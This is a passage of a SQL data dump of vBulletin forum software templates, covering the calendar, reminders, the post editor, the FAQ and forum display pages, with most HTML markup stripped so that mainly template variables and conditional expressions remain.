(1269, -1, 'calendar_monthly', '\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[add_new_event] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n\r\n \r\n\r\n $calendarjump\r\n\r\n \r\n \r\n
', '\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n $vbphrase[add_new_event] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n\r\n \r\n\r\n $calendarjump\r\n\r\n \r\n \r\n
', 'template', 1116461829, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1270, -1, 'calendar_monthly_birthday', '', '', 'template', 1104192212, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1271, -1, 'calendar_monthly_day', '\".(($show[\'highlighttoday\']) ? (\"\r\n \r\n\") : (\"\r\n \r\n\")).\"\r\n\r\n\r\n \".(($show[\'birthdaylink\']) ? (\"\r\n
\r\n \") : (\"\r\n $userbdays\r\n \")).\"\r\n \".(($show[\'eventlink\']) ? (\"\r\n
\r\n \") : (\"\r\n $userevents\r\n \")).\"\r\n
\r\n \r\n', '\r\n \r\n \r\n \r\n\r\n\r\n
\r\n \r\n $day \r\n \r\n $day\r\n \r\n \r\n $dayname\r\n
\r\n\r\n
\r\n \r\n \r\n $userbdays\r\n \r\n
\r\n \r\n \r\n $userevents\r\n \r\n
\r\n \r\n', 'template', 1088104360, 'vBulletin Solutions', '', 'vbulletin'),
(1272, -1, 'calendar_monthly_day_other', '\r\n \r\n $otherday$day \r\n $otherdayname$dayname\r\n
\r\n \r\n \r\n', '\r\n \r\n $otherday$day \r\n $otherdayname$dayname\r\n
\r\n \r\n \r\n', 'template', 1098315510, 'vBulletin Solutions', '', 'vbulletin'),
(1273, -1, 'calendar_monthly_event', '\r\n', '\r\n', 'template', 1226758721, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'),
(1274, -1, 'calendar_monthly_header', '\r\n session->vars[\'sessionurl\'] . \"month=$month&year=$year&c=$calendarid&do=displaymonth\\\">$monthname $year \r\n \r\n$calendarrowbits\r\n', '\r\n $monthname $year \r\n \r\n$calendarrowbits\r\n', 'template', 1098315088, 'vBulletin Solutions', '', 'vbulletin'),
(1275, -1, 'calendar_monthly_week', '\r\n session->vars[\'sessionurl\'] . \"c=$calendarid&week=$firstweek&do=displayweek&month=$month\\\" title=\\\"$vbphrase[view_this_week_in_detail]\\\" style=\\\"font-family:arial,sans-serif; text-decoration:none\\\">> > > \r\n $calendardaybits\r\n \r\n', '\r\n > > > \r\n $calendardaybits\r\n \r\n', 'template', 1098315024, 'vBulletin Solutions', '', 'vbulletin'),
(1276, -1, 'CALENDAR_REMINDER', '\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"', '\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n ', 'template', 1208875493, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1277, -1, 'calendar_reminder_choosetype', '\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[add_reminder]: $eventinfo[title] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n $vbphrase[when_to_send_reminder_before_event] :\r\n \r\n $vbphrase[one_hour] \r\n $vbphrase[two_hours] \r\n $vbphrase[three_hours] \r\n $vbphrase[four_hours] \r\n $vbphrase[six_hours] \r\n $vbphrase[eight_hours] \r\n $vbphrase[twelve_hours] \r\n $vbphrase[eighteen_hours] \r\n $vbphrase[one_day] \r\n $vbphrase[two_days] \r\n $vbphrase[three_days] \r\n \r\n \r\n \r\n $vbphrase[reminder_emails_can_be_early_or_late] \r\n
\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n \r\n $vbphrase[add_reminder]: $eventinfo[title] \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n \r\n \r\n $vbphrase[when_to_send_reminder_before_event] :\r\n \r\n $vbphrase[one_hour] \r\n $vbphrase[two_hours] \r\n $vbphrase[three_hours] \r\n $vbphrase[four_hours] \r\n $vbphrase[six_hours] \r\n $vbphrase[eight_hours] \r\n $vbphrase[twelve_hours] \r\n $vbphrase[eighteen_hours] \r\n $vbphrase[one_day] \r\n $vbphrase[two_days] \r\n $vbphrase[three_days] \r\n \r\n \r\n \r\n $vbphrase[reminder_emails_can_be_early_or_late] \r\n
\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875503, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1278, -1, 'calendar_reminder_eventbit', '\r\n \r\n\r\n \r\n\r\n \r\n \".(($event[\'username\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"u=$event[userid]\',\'_self\')\\\">$event[username] \r\n \") : (\"\")).\"\r\n
\r\n \r\n\r\n \r\n \r\n \r\n \".(($show[\'recuroption\']) ? (\"\r\n $recurcriteria \" . construct_phrase(\"$vbphrase[date_x_to_y]\", \"$date1\", \"$date2\") . \" \r\n \" . construct_phrase(\"$vbphrase[time_x_to_y]\", \"$time1\", \"$time2\") . \"\r\n \") : (\"\r\n \".(($daterange) ? (\"\r\n $daterange\r\n \") : (\"\r\n \".(($show[\'singleday\']) ? (\"\r\n $eventdate\r\n \") : (\"\r\n $date1 $time1 $date2 $time2 \r\n \")).\"\r\n \")).\"\r\n \")).\"\r\n \r\n
\r\n \r\n\r\n \r\n $event[reminder]
\r\n \r\n\r\n \r\n \r\n
\r\n\r\n ', '\r\n \r\n\r\n \r\n\r\n \r\n \r\n $event[username] \r\n \r\n
\r\n \r\n\r\n \r\n \r\n
\r\n \r\n $recurcriteria$vbphrase[date_x_to_y] \r\n $vbphrase[time_x_to_y] \r\n \r\n \r\n $daterange\r\n \r\n \r\n $eventdate\r\n \r\n $date1 $time1 $date2 $time2 \r\n \r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n $event[reminder]
\r\n \r\n\r\n \r\n \r\n
\r\n\r\n ', 'template', 1166829122, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1279, -1, 'calendar_showbirthdays', 'session->vars[\'sessionurl\'] . \"u=$userid\\\">$username \".(($show[\'age\']) ? (\" $age\") : (\"\")).\"', '$username $age ', 'template', 1070050091, 'vBulletin Solutions', '', 'vbulletin'),
(1280, -1, 'calendar_showevents', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'birthdays\']) ? (\"\r\n\r\n
\r\n \r\n \" . construct_phrase(\"$vbphrase[members_with_birthdays_on_x]\", \"$pagetitle\") . \" \r\n \r\n \r\n $userbdays \r\n \r\n
\r\n
\r\n\") : (\"\")).\"\r\n\r\n$spacer_close\r\n\r\n$caldaybits\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n \r\n $calendarjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n
\r\n \r\n $vbphrase[members_with_birthdays_on_x] \r\n \r\n \r\n $userbdays \r\n \r\n
\r\n
\r\n \r\n\r\n$spacer_close\r\n\r\n$caldaybits\r\n\r\n$spacer_open\r\n\r\n\r\n\r\n \r\n $calendarjump \r\n \r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1195729863, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1281, -1, 'calendar_showeventsbit', '$spacer_open\r\n\r\n\r\n
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n\r\n\r\n\r\n $eventinfo[title] \r\n \r\n\r\n $vbphrase[calendar] : $calendarinfo[title] \r\n \r\n\r\n \r\n \".(($show[\'postedby\'] OR $show[\'subscribed\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \".(($show[\'subscribelink\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($show[\'recuroption\']) ? (\"\r\n $recurcriteria
\r\n \" . construct_phrase(\"$vbphrase[date_x_to_y]\", \"$date1\", \"$date2\") . \"\".(($show[\'adjustedday\']) ? (\"*\") : (\"\")).\"\r\n
\" . construct_phrase(\"$vbphrase[time_x_to_y]\", \"$time1\", \"$time2\") . \"\r\n \") : (\"\r\n \".(($show[\'holiday\'] OR $show[\'singleday\']) ? (\"\r\n $eventdate\r\n \") : (\"\r\n \".(($show[\'daterange\']) ? (\"\" . construct_phrase(\"$vbphrase[date_x_to_y]\", \"$date1\", \"$date2\") . \"\") : (\"$eventdate\")).\"
\" . construct_phrase(\"$vbphrase[time_x_to_y]\", \"$time1\", \"$time2\") . \" \r\n \")).\"\r\n \")).\"\r\n \".(($show[\'ignoredst\']) ? (\"\r\n \r\n \") : (\"\r\n
*$vbphrase[event_uses_dst]
\r\n \")).\"\r\n \".(($show[\'adjustedday\']) ? (\"\r\n
*\" . construct_phrase(\"$vbphrase[event_posted_for_timezone_x]\", \"$eventinfo[timezone]\") . \"
\r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n\r\n \r\n\r\n \".(($show[\'customfields\']) ? (\"\r\n $customfields\r\n \r\n \") : (\"\")).\"\r\n\r\n $eventinfo[event]
\r\n\r\n \".(($show[\'eventoptions\']) ? (\"\r\n \r\n \r\n $vbphrase[event_options] \r\n \".(($show[\'caneditevent\']) ? (\"\r\n :: $vbphrase[edit_event] \r\n \") : (\"\")).\"\r\n \".(($show[\'candeleteevent\']) ? (\"\r\n :: $vbphrase[delete_event] \r\n \") : (\"\")).\"\r\n \".(($show[\'canmoveevent\']) ? (\"\r\n :: $vbphrase[move_event] \r\n \") : (\"\")).\"\r\n $gobutton\r\n
\r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n$spacer_close', '$spacer_open\r\n\r\n$spacer_close', 'template', 1208875509, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1282, -1, 'calendar_showeventsbit_customfield', '\".(($show[\'customoption\']) ? (\"\r\n\r\n $customtitle : $customoption\r\n
\r\n\") : (\"\")).\"\r\n', '\r\n\r\n $customtitle : $customoption\r\n
\r\n \r\n', 'template', 1070164734, 'vBulletin Solutions', '', 'vbulletin'),
(1283, -1, 'calendar_smallmonth_day', '\r\n\r\n \".(($show[\'daylink\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=getinfo&day=$year-$month-$day&c=$calendarid\\\" title=\\\"$eventdesc\\\">$day \r\n \") : (\"\r\n $day\r\n \")).\"\r\n \r\n', '\r\nalt1 alt2\" style=\"border:1px solid red; font-weight:bold\" title=\"$vbphrase[today]\" >\r\n \r\n $day \r\n \r\n $day\r\n \r\n \r\n', 'template', 1073837062, 'vBulletin Solutions', '', 'vbulletin'),
(1284, -1, 'calendar_smallmonth_day_other', '\r\n$day ', '\r\n$day ', 'template', 1098315564, 'vBulletin Solutions', '', 'vbulletin'),
(1285, -1, 'calendar_smallmonth_header', '\r\n session->vars[\'sessionurl\'] . \"month=$month&year=$year&c=$calendarid&do=displaymonth\\\">$monthname $year \r\n \r\n\r\n \r\n \".(($show[\'day1\']) ? (\"$day1 \") : (\"\")).\"\r\n \".(($show[\'day2\']) ? (\"$day2 \") : (\"\")).\"\r\n \".(($show[\'day3\']) ? (\"$day3 \") : (\"\")).\"\r\n \".(($show[\'day4\']) ? (\"$day4 \") : (\"\")).\"\r\n \".(($show[\'day5\']) ? (\"$day5 \") : (\"\")).\"\r\n \".(($show[\'day6\']) ? (\"$day6 \") : (\"\")).\"\r\n \".(($show[\'day7\']) ? (\"$day7 \") : (\"\")).\"\r\n \r\n$calendarrowbits\r\n', '\r\n $monthname $year \r\n \r\n\r\n \r\n $day1 \r\n $day2 \r\n $day3 \r\n $day4 \r\n $day5 \r\n $day6 \r\n $day7 \r\n \r\n$calendarrowbits\r\n', 'template', 1070259396, 'vBulletin Solutions', '', 'vbulletin'),
(1286, -1, 'calendar_smallmonth_week', '\r\n session->vars[\'sessionurl\'] . \"c=$calendarid&week=$firstweek&do=displayweek&month=$month\\\" title=\\\"$vbphrase[view_this_week_in_detail]\\\" style=\\\"font-family:arial,sans-serif; text-decoration:none\\\">> \r\n $calendardaybits\r\n \r\n', '\r\n > \r\n $calendardaybits\r\n \r\n', 'template', 1070389069, 'vBulletin Solutions', '', 'vbulletin'),
(1287, -1, 'calendar_weekly', '\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \".(($show[\'secondmonth\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n $vbphrase[add_new_event] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n\r\n $calendarjump\r\n\r\n \r\n \r\n
', '\r\n\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n $vbphrase[add_new_event] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n\r\n $calendarjump\r\n\r\n \r\n \r\n
', 'template', 1116461852, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1288, -1, 'calendar_weekly_day', '\".(($show[\'monthname\']) ? (\"\r\n\r\n \r\n \r\n session->vars[\'sessionurl\'] . \"c=$calendarid&week=$prevweek\\\">« $vbphrase[week] \r\n |\r\n session->vars[\'sessionurl\'] . \"c=$calendarid&week=$nextweek\\\">$vbphrase[week] » \r\n \r\n $weekmonth $weekyear\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n session->vars[\'sessionurl\'] . \"do=add&c=$calendarinfo[calendarid]&day={$weekyear}-{$month}-{$weekday}\\\">$vbphrase[add_new_event] \r\n $weekdayname\r\n \r\n \r\n\r\n \r\n \".(($show[\'events\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=getinfo&day={$weekyear}-{$month}-{$weekday}&c=$calendarinfo[calendarid]\';\\\">$weekday
\r\n \") : (\"\r\n $weekday\r\n \")).\"\r\n \r\n \".(($show[\'highlighttoday\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \".(($show[\'events\']) ? (\"\r\n $userevents\r\n \") : (\"\")).\"\r\n \".(($show[\'birthdays\']) ? (\"\r\n \r\n
\r\n
\" . construct_phrase(\"$vbphrase[x_birthdays]\", \"$userbdays\") . \" \r\n
\r\n \") : (\"\")).\"\r\n \".((!$show[\'events\'] AND !$show[\'birthdays\']) ? (\" \") : (\"\")).\"\r\n \r\n ', '\r\n\r\n \r\n \r\n « $vbphrase[week] \r\n |\r\n $vbphrase[week] » \r\n \r\n $weekmonth $weekyear\r\n \r\n \r\n \r\n\r\n \r\n $vbphrase[add_new_event] \r\n $weekdayname\r\n \r\n \r\n\r\n \r\n \r\n $weekday
\r\n \r\n $weekday\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n $userevents\r\n \r\n \r\n \r\n
\r\n
$vbphrase[x_birthdays] \r\n
\r\n \r\n \r\n \r\n ', 'template', 1231328714, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1289, -1, 'calendar_weekly_event', '', '\r\n
\r\n $eventtitle \r\n \r\n \r\n \r\n \r\n $vbphrase[all_day]\r\n \r\n $fromtime - $totime\r\n \r\n
\r\n \r\n \r\n \r\n
', 'template', 1076113443, 'vBulletin Solutions', '', 'vbulletin'),
(1290, -1, 'calendar_yearly', '\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n $vbphrase[add_new_event] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n\r\n $calendarjump\r\n\r\n \r\n \r\n
', '\r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n $vbphrase[add_new_event] \r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \r\n \r\n\r\n $calendarjump\r\n\r\n \r\n \r\n
', 'template', 1116461889, 'vBulletin Solutions', '3.5.0 Beta 1', 'vbulletin'),
(1291, -1, 'editor_clientscript', '\r\n\r\n\r\n', '\r\n\r\n\r\n', 'template', 1223980688, 'vBulletin Solutions', '3.8.0 Beta 2', 'vbulletin'),
(1292, -1, 'editor_css', '\r\n\r\n', '\r\n\r\n', 'template', 1203426342, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1293, -1, 'editor_jsoptions_font', 'Arial\r\nArial Black\r\nArial Narrow\r\nBook Antiqua\r\nCentury Gothic\r\nComic Sans MS\r\nCourier New\r\nFixedsys\r\nFranklin Gothic Medium\r\nGaramond\r\nGeorgia\r\nImpact\r\nLucida Console\r\nLucida Sans Unicode\r\nMicrosoft Sans Serif\r\nPalatino Linotype\r\nSystem\r\nTahoma\r\nTimes New Roman\r\nTrebuchet MS\r\nVerdana', 'Arial\r\nArial Black\r\nArial Narrow\r\nBook Antiqua\r\nCentury Gothic\r\nComic Sans MS\r\nCourier New\r\nFixedsys\r\nFranklin Gothic Medium\r\nGaramond\r\nGeorgia\r\nImpact\r\nLucida Console\r\nLucida Sans Unicode\r\nMicrosoft Sans Serif\r\nPalatino Linotype\r\nSystem\r\nTahoma\r\nTimes New Roman\r\nTrebuchet MS\r\nVerdana', 'template', 1061903840, 'vBulletin Solutions', '', 'vbulletin'),
(1294, -1, 'editor_jsoptions_size', '1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7', '1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7', 'template', 1040219143, 'vBulletin Solutions', '', 'vbulletin'),
(1295, -1, 'editor_smilie', '$smiliehtml ', '$smiliehtml ', 'template', 1118499598, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'),
(1296, -1, 'editor_smiliebox', '\".(($show[\'smiliebox\']) ? (\"\r\n\r\n $vbphrase[smilies] \r\n \r\n \r\n\") : (\"\r\n
\r\n\")).\"', '\r\n\r\n $vbphrase[smilies] \r\n \r\n \r\n \r\n
\r\n ', 'template', 1118866966, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'),
(1297, -1, 'editor_smiliebox_category', '\r\n', '\r\n', 'template', 1067447256, 'vBulletin Solutions', '', 'vbulletin'),
(1298, -1, 'editor_smiliebox_row', '\r\n$smiliecells\r\n \r\n', '\r\n$smiliecells\r\n \r\n', 'template', 1067444208, 'vBulletin Solutions', '', 'vbulletin'),
(1299, -1, 'editor_smiliebox_straggler', ' ', ' ', 'template', 1067446691, 'vBulletin Solutions', '', 'vbulletin'),
(1300, -1, 'editor_styles_button_down', 'background: #98B5E2; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'background: #98B5E2; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'template', 1072806963, 'vBulletin Solutions', '', 'vbulletin'),
(1301, -1, 'editor_styles_button_hover', 'background: #C1D2EE; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'background: #C1D2EE; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'template', 1072806963, 'vBulletin Solutions', '', 'vbulletin'),
(1302, -1, 'editor_styles_button_normal', 'background: #E1E1E2; color: #000000; padding: 1px; border: none;', 'background: #E1E1E2; color: #000000; padding: 1px; border: none;', 'template', 1118926627, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'),
(1303, -1, 'editor_styles_button_selected', 'background: #F1F6F8; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'background: #F1F6F8; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'template', 1118926627, 'vBulletin Solutions', '3.5.0 Beta 2', 'vbulletin'),
(1304, -1, 'editor_styles_menu_down', 'background: #98B5E2; color: #316AC5; padding: 0px; border: 1px solid #316AC5;', 'background: #98B5E2; color: #316AC5; padding: 0px; border: 1px solid #316AC5;', 'template', 1072806963, 'vBulletin Solutions', '', 'vbulletin'),
(1305, -1, 'editor_styles_menu_hover', 'background: #C1D2EE; color: #316AC5; padding: 0px; border: 1px solid #316AC5;', 'background: #C1D2EE; color: #316AC5; padding: 0px; border: 1px solid #316AC5;', 'template', 1072806963, 'vBulletin Solutions', '', 'vbulletin'),
(1306, -1, 'editor_styles_menu_normal', 'background: #FFFFFF; color: #000000; padding: 0px; border: 1px solid #FFFFFF;', 'background: #FFFFFF; color: #000000; padding: 0px; border: 1px solid #FFFFFF;', 'template', 1072806963, 'vBulletin Solutions', '', 'vbulletin'),
(1307, -1, 'editor_styles_popup_down', 'background: #98B5E2; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'background: #98B5E2; color: #000000; padding: 0px; border: 1px solid #316AC5;', 'template', 1072806963, 'vBulletin Solutions', '', 'vbulletin'),
(1308, -1, 'editor_toolbar_off', '\r\n$vBeditTemplate[clientscript]\r\n\r\n\r\n $newpost[message] \r\n \r\n
\r\n\r\n\r\n', '\r\n$vBeditTemplate[clientscript]\r\n\r\n\r\n $newpost[message] \r\n \r\n
\r\n\r\n\r\n', 'template', 1205751361, 'vBulletin Solutions', '3.7.0 Release Candidate 1', 'vbulletin'),
(1309, -1, 'editor_toolbar_on', '$vBeditTemplate[clientscript]\r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n $newpost[message] \r\n \r\n \".(($smiliebox) ? (\"$smiliebox \") : (\"\")).\"\r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n', '$vBeditTemplate[clientscript]\r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n $newpost[message] \r\n \r\n $smiliebox \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n', 'template', 1210932038, 'vBulletin Solutions', '3.7.1', 'vbulletin'),
(1310, -1, 'FAQ', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[faq]\".(($show[\'faqtitle\']) ? (\": $faqtitle\") : (\"\")).\" \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n$faqbits\r\n\r\n$footer\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$vboptions[bbtitle] - $vbphrase[faq]: $faqtitle \r\n\r\n\r\n$header\r\n\r\n$navbar\r\n\r\n\r\n \r\n \r\n\r\n\r\n\r\n \r\n\r\n \r\n\r\n$faqbits\r\n\r\n$footer\r\n\r\n', 'template', 1195729840, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1311, -1, 'faqbit', ' \r\n\r\n\r\n\r\n \r\n', ' \r\n\r\n\r\n\r\n $faq[title] $faq[title] \r\n \r\n\r\n\r\n $faq[text] \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n
\r\n\r\n \r\n', 'template', 1070526899, 'vBulletin Solutions', '', 'vbulletin'),
(1312, -1, 'faqbit_link', 'session->vars[\'sessionurl\'] . \"faq=$faq[faqname]#faq_$subfaq[faqname]\\\">$subfaq[title] \r\n', '$subfaq[title] \r\n', 'template', 1068747203, 'vBulletin Solutions', '', 'vbulletin'),
(1313, -1, 'FORUMDISPLAY', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n$foruminfo[title_clean]\".(($pagenumber>1) ? (\" - \" . construct_phrase(\"$vbphrase[page_x]\", \"$pagenumber\") . \"\") : (\"\")).\" - \" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" \r\n\".(($show[\'inlinemod\']) ? (\"\") : (\"\")).\"\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\".(($show[\'forumslist\']) ? (\"\r\n\r\n\r\n\r\n $vbphrase[subforums] : $foruminfo[title] \r\n \".(($show[\'forumsearch\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
\r\n\r\n\r\n \r\n \r\n $vbphrase[forum] \r\n $vbphrase[last_post] \r\n $vbphrase[threads] \r\n $vbphrase[posts] \r\n \".(($GLOBALS[\'vbulletin\']->options[showmoderatorcolumn]) ? (\"\r\n $vbphrase[moderator] \r\n \") : (\"\")).\"\r\n \r\n \r\n$forumbits\r\n
\r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'threadslist\']) ? (\"\r\n\r\n\r\n\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n $vbphrase[threads_in_forum] : $foruminfo[title] \r\n \r\n \".(($show[\'forumsearch\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n \r\n\r\n$ad_location[ad_forumdisplay_afterthreads]\r\n\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \".(($show[\'activeusers\']) ? (\"\r\n $vbphrase[currently_active_users] \r\n \") : (\"\")).\"\r\n \".(($show[\'moderators\']) ? (\"\r\n $vbphrase[moderators] \r\n \") : (\"\")).\"\r\n \r\n\r\n \" . construct_phrase(\"$vbphrase[showing_threads_x_to_y_of_z]\", \"$limitlower\", \"$limitupper\", \"$totalthreads\") . \" \r\n \".(($show[\'activeusers\']) ? (\"\r\n $totalonline (\" . construct_phrase(\"$vbphrase[x_members_y_guests]\", \"$numberregistered\", \"$numberguest\") . \") \r\n \") : (\"\")).\"\r\n \".(($show[\'moderators\']) ? (\"\r\n $vbphrase[moderators] : $totalmods \r\n \") : (\"\")).\"\r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n $vbphrase[sorted_by]
\r\n \r\n $vbphrase[thread_title] \r\n $vbphrase[last_post_time] \r\n $vbphrase[thread_start_time] \r\n $vbphrase[number_of_replies] \r\n $vbphrase[number_of_views] \r\n $vbphrase[thread_starter] \r\n \".(($show[\'threadratings\']) ? (\"$vbphrase[thread_rating] \") : (\"\")).\"\r\n \r\n \r\n \r\n $vbphrase[sort_order]
\r\n \r\n $vbphrase[ascending] \r\n $vbphrase[descending] \r\n \r\n \r\n \r\n $vbphrase[from_the]
\r\n \r\n $vbphrase[last_day] \r\n $vbphrase[last_2_days] \r\n $vbphrase[last_week] \r\n $vbphrase[last_10_days] \r\n $vbphrase[last_2_weeks] \r\n $vbphrase[last_month] \r\n $vbphrase[last_45_days] \r\n $vbphrase[last_2_months] \r\n $vbphrase[last_75_days] \r\n $vbphrase[last_100_days] \r\n $vbphrase[last_year] \r\n $vbphrase[beginning] \r\n \r\n \r\n \r\n \r\n \r\n \".(($prefix_options) ? (\"\r\n $vbphrase[prefix]
\r\n \r\n $vbphrase[any_prefix_meta] \r\n $vbphrase[no_prefix_meta] \r\n $prefix_options\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n \".(($show[\'activeusers\']) ? (\"\r\n $activeusers
\r\n \") : (\"\")).\"\r\n \".(($show[\'moderators\']) ? (\"\r\n $moderatorslist
\r\n \") : (\"\")).\"\r\n \r\n
